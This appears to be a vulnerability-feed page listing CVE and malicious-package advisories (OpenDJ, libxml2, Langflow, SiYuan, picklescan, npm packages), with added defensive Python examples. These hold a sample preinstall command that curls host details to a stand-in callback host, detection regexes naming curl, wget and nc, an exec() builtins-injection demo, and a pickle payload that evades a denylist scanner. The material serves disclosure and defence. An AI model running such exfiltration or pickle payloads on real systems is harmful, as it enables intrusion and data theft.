
Positive Technologies

PT-2026-51446

Name of the Vulnerable Software and Affected Versions: OpenDJ Community Edition versions prior to 5.1.1. Description: A Deserialization of Untrusted Data issue in the JMX RMI connector allows an unauthenticated remote attacker to deserialize arbitrary Java objects on the server. The issue occurs...

CVSS 9.2 | AI score 6.2
Exploits: 0 | References: 4
OSV

UBUNTU-CVE-2026-6653

Use After Free in libxml2's xmlParseInternalSubset (GNOME libxml2 versions 2.9.11 to 2.11.0) allows a remote attacker to cause a denial of service via maliciously crafted XML input with improper entity resolution handling...

CVSS 8.3 | AI score 5.9 | EPSS 0.00289
Exploits: 0 | References: 5
Cvelist

CVE-2026-12815 coollabsio coolify Image Name os command injection

A vulnerability has been found in coollabsio coolify 4.0.0. Impacted is an unknown function of the Image Name Handler component. Manipulation leads to OS command injection. The attack may be performed remotely. The vendor was contacted early about this disclosure but did not respond in an...

CVSS 6.5 | EPSS 0.01158
Exploits: 0 | References: 5
Snyk

Integer Overflow or Wraparound

Overview Affected versions of this package are vulnerable to Integer Overflow or Wraparound via the xmlwf process when the -d parameter is used to specify an output directory. An attacker can cause unintended behavior or potentially execute arbitrary code by providing a specially crafted output...

CVSS 7.3 | AI score 6.2 | EPSS 0.00098
Exploits: 0 | References: 2
Snyk

Integer Overflow or Wraparound

Overview Affected versions of this package are vulnerable to Integer Overflow or Wraparound in the resolveSystemId function. An attacker can cause unexpected behavior or potentially execute arbitrary code by providing specially crafted input that triggers an integer overflow during processing...

CVSS 7.5 | AI score 6.2 | EPSS 0.0011
Exploits: 0 | References: 2
OSV

MAL-2026-6249 Malicious code in blinkit-core (npm)

Source: amazon-inspector (2ca70b0a6be36daf245deb50dd6b3595a9bfba29c62770e82365152a02832cf8). On npm install, the package's preinstall lifecycle hook runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/ and POSTs the installer...

AI score 6
Exploits: 0 | References: 1
OSV

MAL-2026-6253 Malicious code in zomato-server (npm)

Source: amazon-inspector (f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00). The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...

AI score 6
Exploits: 0 | References: 1
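Both MAL entries above describe the same install-time pattern: a preinstall hook that runs curl to POST host fingerprinting data to an out-of-band callback domain. The script below is an added example (not OSV's or amazon-inspector's code) that audits a package.json, and optionally a whole node_modules tree, for that pattern. The sample package.json, the callback hostname in it, and the indicator lists are constructed for the demo and are not exhaustive.

```python
"""Audit npm lifecycle hooks for install-time exfiltration of the kind seen in
blinkit-core and zomato-server: a network client run from preinstall that POSTs
host details to a callback domain.

Added example; this is not OSV's or amazon-inspector's code. The package.json
below and the callback hostname in it are constructed for the demo.
"""
import json
import os
import re

# Hooks npm executes automatically when the package is installed as a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# A library package has no reason to reach the network from an install hook.
NETWORK_CLIENT = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|iwr)\b")
# Host fingerprinting that such hooks typically collect before sending it out.
FINGERPRINT = re.compile(r"\b(hostname|whoami|pwd|uname|ifconfig|ipconfig)\b")
# Out-of-band callback services frequently used as collectors (non-exhaustive).
CALLBACK_DOMAIN = re.compile(
    r"\b(oast\.(site|fun|live|pro|me|online)|oastify\.com|interact\.sh|burpcollaborator\.net)\b"
)

# Constructed sample package.json mirroring the behaviour the two MAL entries describe.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-core",
    "version": "1.0.3",
    "scripts": {
        "preinstall": 'curl -s -X POST -d "$(hostname),$(whoami),$(pwd)" '
                      "http://callback.example-attacker.oast.site/",
        "test": "node test.js",
    },
})


def audit_lifecycle_scripts(package_json_text):
    """Return [(hook, [reasons...])] for install-time hooks that look like exfiltration."""
    pkg = json.loads(package_json_text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd:
            continue
        reasons = []
        if NETWORK_CLIENT.search(cmd):
            reasons.append("network client invoked from install hook")
        if FINGERPRINT.search(cmd):
            reasons.append("host fingerprinting command")
        if CALLBACK_DOMAIN.search(cmd):
            reasons.append("known out-of-band callback domain")
        if reasons:
            findings.append((hook, reasons))
    return findings


def audit_node_modules(root):
    """Walk an installed tree and audit every package.json found under it."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                findings = audit_lifecycle_scripts(fh.read())
        except (OSError, ValueError):
            continue  # unreadable or not JSON: skip it rather than abort the audit
        if findings:
            results[os.path.relpath(dirpath, root)] = findings
    return results


if __name__ == "__main__":
    for hook, reasons in audit_lifecycle_scripts(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {', '.join(reasons)}")
    # To audit a real tree: audit_node_modules("node_modules")
```

The audit is a triage aid, not a verdict: legitimate native packages do run install hooks (node-gyp builds, for instance), so the signal is the combination of a network client, fingerprinting commands and a callback domain. The blanket mitigation for CI and developer machines is to refuse lifecycle scripts from dependencies altogether (`npm config set ignore-scripts true`, or `npm install --ignore-scripts`) and to enable them only for packages that have been reviewed.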
IBM Security Bulletins

Security Bulletin: Unauthenticated Flow Execution via Webhook Endpoint in Langflow OSS

Summary: Langflow OSS POST /api/v1/webhook/{flow_id} executes any user's flow without authentication by default. The setting WEBHOOK_AUTH_ENABLE defaults to False in the auth configuration. When False, the webhook handler calls get_user_by_flow_id_or_endpoint_name and trusts the caller unconditionally with no credential chec...

CVSS 9.8 | AI score 5.9 | EPSS 0.00277
Exploits: 0 | Affected Software: 1
IBM Security Bulletins

Security Bulletin: Unauthenticated Remote Code Execution in Langflow OSS PythonREPLComponent via Builtins Injection

Summary: Langflow OSS contains an unauthenticated RCE vulnerability in PythonREPLComponent ("Python Interpreter"). The component's get_globals builds a restricted globals dict from the global_imports whitelist (default: "math") but never sets globals["__builtins__"] = {}. CPython's exec automatically inserts the full builtins...

CVSS 10 | AI score 6.4 | EPSS 0.00529
Exploits: 0 | Affected Software: 1
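The bulletin's root cause is a CPython rule worth seeing run: when the globals dict passed to exec() has no "__builtins__" key, the interpreter inserts the real builtins, so an import whitelist on its own restricts nothing. The following is an added example, not Langflow's code; build_globals, run_as_shipped and run_with_empty_builtins are hypothetical stand-ins for the pattern the bulletin describes (a globals dict built from a module whitelist defaulting to "math", handed to exec()).

```python
"""What exec() does when the globals dict has no "__builtins__" key.

Added example, not Langflow's code: the helpers below are hypothetical stand-ins
for the pattern the bulletin describes (a globals dict built from a module
whitelist, defaulting to "math", passed to exec()).
"""
import importlib


def build_globals(allowed_modules=("math",)):
    """Globals built from an import whitelist. Deliberately no "__builtins__" key,
    matching the flaw described above."""
    return {name: importlib.import_module(name) for name in allowed_modules}


def run_as_shipped(code):
    """Vulnerable pattern: CPython sees that "__builtins__" is missing and inserts
    the real builtins, so the code can __import__ anything."""
    g = build_globals()
    exec(code, g)
    return g


def run_with_empty_builtins(code):
    """Fix implied by the bulletin: pin "__builtins__" to an empty dict so the
    interpreter does not supply the real one."""
    g = build_globals()
    g["__builtins__"] = {}
    exec(code, g)
    return g


def outcome(runner, code):
    """Run code through runner; report the names it bound, or the exception type."""
    try:
        g = runner(code)
    except Exception as exc:  # the exception type is the point of the demo
        return ("error", type(exc).__name__)
    bound = sorted(k for k in g if not k.startswith("__") and k != "math")
    return ("ok", bound)


def builtins_were_injected(code="x = 1"):
    """True if exec() added "__builtins__" to a globals dict that lacked it."""
    return "__builtins__" in run_as_shipped(code)


if __name__ == "__main__":
    print(builtins_were_injected())                                  # True
    print(outcome(run_as_shipped, "import os; cwd = os.getcwd()"))   # ('ok', ['cwd', 'os'])
    print(outcome(run_with_empty_builtins, "import os"))             # ('error', 'ImportError')
    print(outcome(run_with_empty_builtins, "n = len('abc')"))        # ('error', 'NameError')
    print(outcome(run_with_empty_builtins, "r = math.sqrt(16)"))     # ('ok', ['r'])
```

Pinning "__builtins__" to an empty dict stops the casual `import os` (the import machinery cannot find `__import__`) but is not a sandbox: attribute walks such as `().__class__.__base__.__subclasses__()` still reach classes that hold references to os and subprocess. Code from an unauthenticated caller belongs in a separate process or container with its own privilege boundary, and the endpoint should require authentication regardless of how the interpreter is configured.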
NVD

CVE-2026-56395

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVSS 9.6 | EPSS 0.00391
Exploits: 0 | References: 2
NVD

CVE-2026-56397

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVSS 9.6 | EPSS 0.00391
Exploits: 0 | References: 2
NVD

CVE-2026-56382

Craft CMS composer package craftcms/cms versions >= 5.5.0 and <= 5.9.13 contain a remote code execution vulnerability in the FieldsController::actionRenderCardPreview method, which passes the fieldLayoutConfig POST parameter directly to Fields::createLayout without calling Component::cleanseConfig...

CVSS 8.6 | EPSS 0.00493
Exploits: 0 | References: 2
NVD

CVE-2025-71378

picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file __reduce__ methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load...

CVSS 8.1 | EPSS 0.00313
Exploits: 0 | References: 2
NVD

CVE-2025-71357

picklescan before 0.0.30 fails to detect malicious pickle files using idlelib.pyshell.ModifiedInterpreter.runcommand in __reduce__ methods. Attackers can embed undetected code in pickle files that executes remote commands when loaded by victims...

CVSS 8.1 | EPSS 0.00248
Exploits: 0 | References: 2
NVD

CVE-2025-71351

picklescan before 0.0.25 fails to detect malicious pickle files that use timeit.timeit in the __reduce__ method, allowing remote code execution. Attackers can craft pickle files that import dangerous libraries like os and execute arbitrary system commands, which evade picklescan detection and execute...

CVSS 7.6 | EPSS 0.00418
Exploits: 0 | References: 2
NVD

CVE-2025-71348

picklescan before 0.0.28 fails to detect malicious pickle files that invoke the torch.utils.configmodule.loadconfig function within __reduce__ methods. Attackers can craft pickle files embedding arbitrary code that evades detection but executes during pickle.load, enabling remote code execution in supply...

CVSS 8.1 | EPSS 0.00353
Exploits: 0 | References: 2
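The four picklescan entries above (CVE-2025-71378, CVE-2025-71357, CVE-2025-71351, CVE-2025-71348) share one root cause: a denylist scanner only catches the callables it has been taught, and a __reduce__ method may name any importable callable that eventually executes a string. The block below is an added example, not picklescan's code. It builds a constructed payload that reduces to cProfile.runctx (the mechanism CVE-2025-71378 describes, with a benign statement that only sets a marker attribute on the builtins module), shows that a toy denylist which omits that callable reports nothing, and contrasts it with an allowlist Unpickler that fails closed.

```python
"""Denylist pickle scanning versus a fail-closed loader.

Added example; not picklescan's code. TOY_DENYLIST is a constructed toy that
omits cProfile.runctx, as picklescan did before 0.0.30; the payload is
constructed here and, when run, only sets a marker attribute on the builtins
module.
"""
import builtins
import collections
import cProfile
import io
import pickle
import pickletools

MARKER = "_PICKLE_DEMO_RAN"


class ReducesToProfilerCall:
    """Serialises as a call to cProfile.runctx, which exec()s its first argument.
    This is the mechanism CVE-2025-71378 describes; the statement is benign here."""

    def __reduce__(self):
        stmt = f"import builtins; builtins.{MARKER} = True"
        return (cProfile.runctx, (stmt, {}, {}))


def build_payload():
    return pickle.dumps(ReducesToProfilerCall(), protocol=4)


def benign_payload():
    return pickle.dumps(collections.OrderedDict(a=1), protocol=4)


# Toy denylist of (module, name) pairs a scanner "knows" are dangerous.
TOY_DENYLIST = {("os", "system"), ("subprocess", "Popen"), ("builtins", "eval"), ("builtins", "exec")}


def referenced_globals(data):
    """Every (module, name) the pickle resolves, from GLOBAL and STACK_GLOBAL opcodes."""
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":            # protocol <= 3: one "module name" argument
            refs.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":      # protocol >= 4: module and name pushed as strings
            refs.append((strings[-2], strings[-1]))
    return refs


def denylist_scan(data):
    """What a denylist scanner reports for the payload: nothing, since cProfile.runctx is unlisted."""
    return [ref for ref in referenced_globals(data) if ref in TOY_DENYLIST]


class AllowlistUnpickler(pickle.Unpickler):
    """Fail closed: only globals the application expects may be resolved."""
    ALLOWED = {("collections", "OrderedDict"), ("builtins", "set"), ("builtins", "frozenset")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def safe_loads_outcome(data):
    """'rejected' if the allowlist loader refuses the pickle, else 'loaded'."""
    try:
        AllowlistUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return "rejected"
    return "loaded"


def unsafe_loads_and_check(data):
    """Plain pickle.loads runs the payload (cProfile.runctx also prints profiler
    stats to stdout); returns True if the marker was set during load."""
    if hasattr(builtins, MARKER):
        delattr(builtins, MARKER)
    pickle.loads(data)
    return getattr(builtins, MARKER, False)


if __name__ == "__main__":
    payload = build_payload()
    print(referenced_globals(payload))          # [('cProfile', 'runctx')]
    print(denylist_scan(payload))               # []  (scanner is blind to it)
    print(safe_loads_outcome(payload))          # rejected
    print(safe_loads_outcome(benign_payload())) # loaded
    print(unsafe_loads_and_check(payload))      # True (code ran during load)
```

Each of the four CVEs is a new callable added to the denylist after someone found it; the allowlist loader needs no such update because anything outside the expected set is refused before it is called. Where a model file must be accepted from an untrusted source, prefer a format that carries no code at all over any pickle scanner.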
Cvelist

CVE-2026-56397 SiYuan - Remote Code Execution via Malicious Bazaar Package Metadata and README

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVSS 9.6 | EPSS 0.00391
Exploits: 0 | References: 2
EUVD

EUVD-2026-38163

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVSS 9.6 | AI score 6.7 | EPSS 0.00391
Exploits: 0 | References: 2
ATTACKERKB

CVE-2026-56397

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVSS 9.6 | AI score 6.7 | EPSS 0.00391
Exploits: 0 | References: 3
Cvelist

CVE-2026-56395 SiYuan - Remote Code Execution via Malicious Bazaar Package Metadata and README

SiYuan before v3.6.1 fails to sanitize package metadata and README content in the Bazaar marketplace, allowing malicious package authors to inject arbitrary HTML and JavaScript. Attackers can achieve remote code execution on any user browsing the Bazaar by embedding XSS payloads in package...

CVSS 9.6 | EPSS 0.00391
Exploits: 0 | References: 2